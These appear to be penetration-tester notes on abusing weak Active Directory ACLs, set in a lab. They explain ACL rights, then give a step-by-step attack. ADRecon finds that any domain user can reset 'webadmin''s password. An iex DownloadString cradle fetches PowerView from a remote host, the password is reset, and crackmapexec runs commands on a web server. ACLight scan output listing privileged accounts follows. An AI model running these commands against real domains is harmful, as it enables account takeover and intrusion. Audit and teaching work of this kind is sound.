============================================================================================================
Abusing weak permissions (ACLs)
============================================================================================================

Active Directory objects such as users and groups are securable objects and DACL/ACEs define who can read/modify those objects (i.e. change account name, reset password, etc). 

Some of the Active Directory object permissions and types that are interesting to review and exploit during penetration tests and security audits:
> GenericAll               - full rights to the object (e.g. add users to a group or reset its password)
> GenericWrite             - update object's attributes (i.e logon script)
> WriteOwner               - change object owner to attacker controlled user take over the object
> WriteDACL                - modify object's ACEs and give attacker full control right over the object
> AllExtendedRights        - ability to add user to a group or reset password
> ForceChangePassword      - ability to change user's password
> Self (Self-Membership)   - ability to add yourself to a group


Notes regarding Windows ACLs
-----------------------------
Every authenticated user gets an access token. Each process or thread created by that user has a copy of that access token. 
The token contains identity (SIDs) and privileges of the user. 

Now, when a process tries to access a securable object (Files, Registry Keys, Services, Domain Objects etc.) it uses the access token. 
A securable object, by definition, has a security descriptor. 
A security descriptor can contain Access Control List (ACL) which is a list of Access Control Entries (ACE). 
There are two types of ACLs  Discretionary Access Control List (DACL) and SACL (System Access Control List). 

DACL controls access to an object and SACL controls logging of access attempts. 


============================================================================================================
Example of an attack exploiting weak ACLs - Arbitrary reset another account password
============================================================================================================

Step 1 - Extract and review the list of ACLs using for example the powershell script 'ADrecon.ps1'
------------------------------------------------------------------------------------------------------------

PS C:\Users\auditor\Documents\ADRecon-master> .\ADRecon.ps1 -Method ADWS -DomainController 192.168.1.50 -Credential security-lab\auditor -Collect ACLs

> file 'DACLs.csv' 

Name	          Type	    ObjectTypeName	            InheritedObjectTypeName	  ActiveDirectoryRights	  AccessControlType	  IdentityReferenceName	  OwnerName	        <SNIP>																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																												
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
<SNIP>
webadmin       User	    User-Force-Change-Password	All	                      ExtendedRight	          Allow	              Domain Users     	      Domain Admins	  	<SNIP>																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																														
webadmin       User	    User-Change-Password         All	                      ExtendedRight	          Allow	              Domain Users     	      Domain Admins		  <SNIP>																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																											
<SNIP>


=> All the accounts member of the 'Domain Users' can arbitary reset the password of the account 'Security-lab\webadmin'
   Our account 'security-lab\auditor' is member of the 'Domain Users'.


Step 2 - Abuse the weak ACL and reset the password of the account 'security-lab\webadmin'
-------------------------------------------------------------------------------------------------------------------

=> Using the PowerView framework we reset the password of the account 'security-lab\webadmin' (we choose the password 'Password123!')

PS C:\Users\auditor\Documents> $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
PS C:\Users\auditor\Documents> iex (New-Object Net.WebClient).DownloadString('http://XX.X.X.XX/PowerView_dev.ps1')
PS C:\Users\auditor\Documents> Set-DomainUserPassword -Identity security-lab\webadmin -AccountPassword $UserPassword


=> Based on the login name 'webadmin', we can guess that the account is more likey admin of the Web servers. 
   So we try to log into the web server 'WEBSRV01' in our security-lab domain.

PS C:\Users\auditor\Documents> crackmapexec.exe -u webadmin -d security-lab -p Password123! -x "whoami" 192.168.1.51
07-18-2020 14:32:39 [*] 192.168.1.51:445 is running Windows 10.0 Build 14393 (name:WEBSRV01) (domain:security-lab)
07-18-2020 14:32:39 [+] 192.168.1.51:445 Login successful security-lab\webadmin:Password123!
07-18-2020 14:32:41 [+] 192.168.1.51:445 Executed command via WMIEXEC
07-18-2020 14:32:41 security-lab\webadmin

=> It worked, we are indeed local admin of the server 'WEBSRV01'...


============================================================================================================
Example - Output of the tool ACLight scan
============================================================================================================

Welcome, starting Multi-Layered ACLight scan

             _    ____ _     _       _     _
            / \  / ___| |   (_) __ _| |__ | |_
           / _ \| |   | |   | |/ _` | '_ \| __|
          / ___ \ |___| |___| | (_| | | | | |_
         /_/   \_\____|_____|_|\__, |_| |_|\__|
                               |___/

ACLight2 - a tool for advanced discovery of Privileged Accounts - including risky Shadow Admins

             Developed by Asaf Hecht (@Hechtov)
 Uses functions from the great PowerView project (@harmj0y)
           Follow Twitter for more future updates


Great, the scan was started - version 3.3.
It could take a while, (5-30+ mins) depends on the size of the network
Discovered 1 Domain

******************************
Starting analysis for Domain: Security-Test-Lab.Local - Layer 1
Got more objects..
Finished scanning this layer in: 0.08 Minutes, 0.001 Hours
Scanning ACLs - Layer 2
Got more objects..
Got more objects..
Got more objects..
Finished scanning this layer in: 0.28 Minutes, 0.005 Hours
Scanning ACLs - Layer 3
Got more objects..
Finished scanning this layer in: 0.12 Minutes, 0.002 Hours
Scanning ACLs - Layer 4
Got more objects..
Finished scanning this layer in: 0.07 Minutes, 0.001 Hours

Analysis in progress...

Analyzed 38 objects
Finished with Domain: Security-Test-Lab.Local after 4 layers

Finished Account analysis

------------ FINISHED ------------

Discovered 22 privileged accounts

Privileged ACLs scan was completed - the results are in  the folder:
C:\Users\qualys\Desktop\Tools\ACLight-master\Results\
Check the "Final Report"

Total time of the scan: 0.94 Minutes, 0.016 Hours
Press any key to continue . . .


=================================================================================================================
Example - "Privileged Accounts - Layers Analysis.txt"
=================================================================================================================

#################################################################
Check the detailed results in the "Final report".
Those are the discovered privileged accounts:

1. SECURITY-LAB\DWAYNE_BLEVINS
2. SECURITY-LAB\FELIPE_DAVID
3. SECURITY-LAB\INGRID_PETERSEN
4. SECURITY-LAB\JEROLD_OLSON
5. SECURITY-LAB\KRYSTAL_BENDER
6. SECURITY-LAB\LEILA_DIAZ
7. SECURITY-LAB\MARGUERITE_MOONEY
8. SECURITY-LAB\MARICELA_CLEMENTS
9. SECURITY-LAB\NATASHA_BLANKENSHIP
10. SECURITY-LAB\NOLA_BOWEN
11. SECURITY-LAB\NORBERTO_BRADLEY
12. SECURITY-LAB\ROD_WALTON
13. SECURITY-LAB\ROLANDO_MATHEWS
14. SECURITY-TEST-LAB\ABIGAIL_ALSTON
15. SECURITY-TEST-LAB\Administrator
16. SECURITY-TEST-LAB\BRITTNEY_KANE
17. SECURITY-TEST-LAB\DARLA_HARPER
18. SECURITY-TEST-LAB\DIANNA_MYERS
19. SECURITY-TEST-LAB\IMOGENE_BATES
20. SECURITY-TEST-LAB\JERMAINE_LYNCH
21. SECURITY-TEST-LAB\Qualys
22. SECURITY-TEST-LAB\SYDNEY_HOOVER

#################################################################
The results of the ACLs layered analysis:
#################################################################

Results for domain:
-------- Security-Test-Lab.Local --------
************************
Layer Number: 1
From group membership:
      SECURITY-LAB\HA-mon-distlist - group:
            SECURITY-TEST-LAB\ABIGAIL_ALSTON
            SECURITY-TEST-LAB\BRITTNEY_KANE
      BUILTIN\Administrators - group:
            SECURITY-TEST-LAB\Administrator
            SECURITY-TEST-LAB\DIANNA_MYERS
            SECURITY-TEST-LAB\JERMAINE_LYNCH
            SECURITY-TEST-LAB\Qualys
            SECURITY-TEST-LAB\SYDNEY_HOOVER
      SECURITY-LAB\Domain Admins - group:
            SECURITY-TEST-LAB\Administrator
            SECURITY-TEST-LAB\DIANNA_MYERS
            SECURITY-TEST-LAB\JERMAINE_LYNCH
            SECURITY-TEST-LAB\Qualys
            SECURITY-TEST-LAB\SYDNEY_HOOVER
      SECURITY-LAB\Enterprise Admins - group:
            SECURITY-TEST-LAB\Administrator
From direct ACL assignment:
      SECURITY-LAB\DWAYNE_BLEVINS
      SECURITY-LAB\FELIPE_DAVID
      SECURITY-LAB\INGRID_PETERSEN
      SECURITY-LAB\JEROLD_OLSON
      SECURITY-LAB\MARGUERITE_MOONEY
      SECURITY-LAB\NOLA_BOWEN
      SECURITY-LAB\NORBERTO_BRADLEY
************************
Layer Number: 2
From group membership:
      BUILTIN\Account Operators - group:
            SECURITY-TEST-LAB\BRITTNEY_KANE
      SECURITY-LAB\GR-elcaminoe-distlist - group:
            SECURITY-TEST-LAB\IMOGENE_BATES
From direct ACL assignment:
      SECURITY-LAB\KRYSTAL_BENDER
      SECURITY-LAB\LEILA_DIAZ
      SECURITY-LAB\MARICELA_CLEMENTS
      SECURITY-LAB\NATASHA_BLANKENSHIP
      SECURITY-LAB\ROD_WALTON
      SECURITY-LAB\ROLANDO_MATHEWS
************************
Layer Number: 3
From group membership:
      SECURITY-LAB\HO-mar-distlist - group:
            SECURITY-TEST-LAB\DARLA_HARPER
From direct ACL assignment:
      Currently Shadow Admins were not detected in the network
************************


=================================================================================================================
Example - "Privileged Accounts - Final Report.CSV"
=================================================================================================================

Layer	Domain	AccountName	AccountGroup	ActiveDirectoryRights	ObjectRights	ObjectDN	ObjectOwner	ObjectClassCategory	IdentitySID	ObjectSID
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3	Security-Test-Lab.Local	SECURITY-TEST-LAB\DARLA_HARPER	SECURITY-LAB\HO-mar-distlist	GenericAll	All	CN=NATASHA_BLANKENSHIP,OU=T2-Roles,OU=Tier 2,OU=Admin,DC=Security-Test-Lab,DC=Local	SECURITY-LAB\Domain Admins	User	S-1-5-21-3698357007-189532211-3203426890-5934	S-1-5-21-3698357007-189532211-3203426890-2154
2	Security-Test-Lab.Local	SECURITY-TEST-LAB\IMOGENE_BATES	SECURITY-LAB\GR-elcaminoe-distlist	GenericAll	All	CN=GOOWLPT1000000,OU=Groups,OU=FIN,OU=Tier 2,DC=Security-Test-Lab,DC=Local	SECURITY-LAB\Domain Admins	Computer	S-1-5-21-3698357007-189532211-3203426890-5680	S-1-5-21-3698357007-189532211-3203426890-6058
2	Security-Test-Lab.Local	SECURITY-TEST-LAB\IMOGENE_BATES	SECURITY-LAB\GR-elcaminoe-distlist	GenericAll	All	CN=CL-not-distlist,OU=Quarantine,DC=Security-Test-Lab,DC=Local	SECURITY-LAB\Domain Admins	Group	S-1-5-21-3698357007-189532211-3203426890-5680	S-1-5-21-3698357007-189532211-3203426890-5933
2	Security-Test-Lab.Local	SECURITY-TEST-LAB\BRITTNEY_KANE	BUILTIN\Account Operators	GenericAll	All	CN=TSTWLPT1000000,OU=Groups,OU=ESM,OU=Stage,DC=Security-Test-Lab,DC=Local	SECURITY-LAB\Domain Admins	Computer	S-1-5-32-548	S-1-5-21-3698357007-189532211-3203426890-5967
2	Security-Test-Lab.Local	SECURITY-TEST-LAB\BRITTNEY_KANE	BUILTIN\Account Operators	GenericAll	All	CN=S-1-5-9,CN=ForeignSecurityPrincipals,DC=Security-Test-Lab,DC=Local	SECURITY-LAB\Domain Admins	top foreignSecurityPrincipal 	S-1-5-32-548	S-1-5-9
2	Security-Test-Lab.Local	SECURITY-TEST-LAB\BRITTNEY_KANE	BUILTIN\Account Operators	GenericAll	All	CN=ROLANDO_MATHEWS,OU=T2-Accounts,OU=Tier 2,OU=Admin,DC=Security-Test-Lab,DC=Local	SECURITY-LAB\Domain Admins	User	S-1-5-32-548	S-1-5-21-3698357007-189532211-3203426890-2319
2	Security-Test-Lab.Local	SECURITY-TEST-LAB\BRITTNEY_KANE	BUILTIN\Account Operators	GenericAll	All	CN=ROD_WALTON,OU=AWS,OU=Stage,DC=Security-Test-Lab,DC=Local	SECURITY-LAB\Domain Admins	User	S-1-5-32-548	S-1-5-21-3698357007-189532211-3203426890-1429
2	Security-Test-Lab.Local	SECURITY-TEST-LAB\BRITTNEY_KANE	BUILTIN\Account Operators	GenericAll	All	CN=RE-fonta_9_b-distlist,OU=Groups,OU=AWS,OU=Tier 2,DC=Security-Test-Lab,DC=Local	SECURITY-LAB\Domain Admins	Group	S-1-5-32-548	S-1-5-21-3698357007-189532211-3203426890-5917
2	Security-Test-Lab.Local	SECURITY-TEST-LAB\BRITTNEY_KANE	BUILTIN\Account Operators	GenericAll	All	CN=Protected Users,CN=Users,DC=Security-Test-Lab,DC=Local	SECURITY-LAB\Domain Admins	Group	S-1-5-32-548	S-1-5-21-3698357007-189532211-3203426890-525
2	Security-Test-Lab.Local	SECURITY-TEST-LAB\BRITTNEY_KANE	BUILTIN\Account Operators	GenericAll	All	CN=NORBERTO_BRADLEY,OU=Test,OU=HRE,OU=Stage,DC=Security-Test-Lab,DC=Local	SECURITY-LAB\Domain Admins	User	S-1-5-32-548	S-1-5-21-3698357007-189532211-3203426890-1180
2	Security-Test-Lab.Local	SECURITY-TEST-LAB\BRITTNEY_KANE	BUILTIN\Account Operators	GenericAll	All	CN=NOLA_BOWEN,OU=Test,OU=FIN,OU=Stage,DC=Security-Test-Lab,DC=Local	SECURITY-LAB\Domain Admins	User	S-1-5-32-548	S-1-5-21-3698357007-189532211-3203426890-2984
2	Security-Test-Lab.Local	SECURITY-TEST-LAB\BRITTNEY_KANE	BUILTIN\Account Operators	GenericAll	All	CN=NATASHA_BLANKENSHIP,OU=T2-Roles,OU=Tier 2,OU=Admin,DC=Security-Test-Lab,DC=Local	SECURITY-LAB\Domain Admins	User	S-1-5-32-548	S-1-5-21-3698357007-189532211-3203426890-2154
2	Security-Test-Lab.Local	SECURITY-TEST-LAB\BRITTNEY_KANE	BUILTIN\Account Operators	GenericAll	All	CN=MARICELA_CLEMENTS,OU=Test,OU=BDE,OU=Stage,DC=Security-Test-Lab,DC=Local	SECURITY-LAB\Domain Admins	User	S-1-5-32-548	S-1-5-21-3698357007-189532211-3203426890-1952
2	Security-Test-Lab.Local	SECURITY-TEST-LAB\BRITTNEY_KANE	BUILTIN\Account Operators	GenericAll	All	CN=MARGUERITE_MOONEY,OU=Groups,OU=FIN,OU=Tier 1,DC=Security-Test-Lab,DC=Local	SECURITY-LAB\Domain Admins	User	S-1-5-32-548	S-1-5-21-3698357007-189532211-3203426890-3204
2	Security-Test-Lab.Local	SECURITY-TEST-LAB\BRITTNEY_KANE	BUILTIN\Account Operators	GenericAll	All	CN=LEILA_DIAZ,OU=Tier 2,OU=Admin,DC=Security-Test-Lab,DC=Local	SECURITY-LAB\Domain Admins	User	S-1-5-32-548	S-1-5-21-3698357007-189532211-3203426890-3136
2	Security-Test-Lab.Local	SECURITY-TEST-LAB\BRITTNEY_KANE	BUILTIN\Account Operators	GenericAll	All	CN=KRYSTAL_BENDER,OU=Test,OU=FSR,OU=Tier 2,DC=Security-Test-Lab,DC=Local	SECURITY-LAB\Domain Admins	User	S-1-5-32-548	S-1-5-21-3698357007-189532211-3203426890-3424
2	Security-Test-Lab.Local	SECURITY-TEST-LAB\BRITTNEY_KANE	BUILTIN\Account Operators	GenericAll	All	CN=JEROLD_OLSON,OU=SEC,OU=Tier 1,DC=Security-Test-Lab,DC=Local	SECURITY-LAB\Domain Admins	User	S-1-5-32-548	S-1-5-21-3698357007-189532211-3203426890-1219
2	Security-Test-Lab.Local	SECURITY-TEST-LAB\BRITTNEY_KANE	BUILTIN\Account Operators	GenericAll	All	CN=ITSWVIR1000000,OU=Devices,OU=OGC,OU=Tier 2,DC=Security-Test-Lab,DC=Local	SECURITY-LAB\Domain Admins	Computer	S-1-5-32-548	S-1-5-21-3698357007-189532211-3203426890-6034
2	Security-Test-Lab.Local	SECURITY-TEST-LAB\BRITTNEY_KANE	BUILTIN\Account Operators	GenericAll	All	CN=ITSWSECS1000001,OU=Devices,OU=BDE,OU=Tier 2,DC=Security-Test-Lab,DC=Local	SECURITY-LAB\Domain Admins	Computer	S-1-5-32-548	S-1-5-21-3698357007-189532211-3203426890-6045
2	Security-Test-Lab.Local	SECURITY-TEST-LAB\BRITTNEY_KANE	BUILTIN\Account Operators	GenericAll	All	CN=INGRID_PETERSEN,OU=OGC,OU=Tier 2,DC=Security-Test-Lab,DC=Local	SECURITY-LAB\Domain Admins	User	S-1-5-32-548	S-1-5-21-3698357007-189532211-3203426890-2813
2	Security-Test-Lab.Local	SECURITY-TEST-LAB\BRITTNEY_KANE	BUILTIN\Account Operators	GenericAll	All	CN=HO-mar-distlist,OU=AWS,OU=People,DC=Security-Test-Lab,DC=Local	SECURITY-LAB\Domain Admins	Group	S-1-5-32-548	S-1-5-21-3698357007-189532211-3203426890-5934
<SNIP>
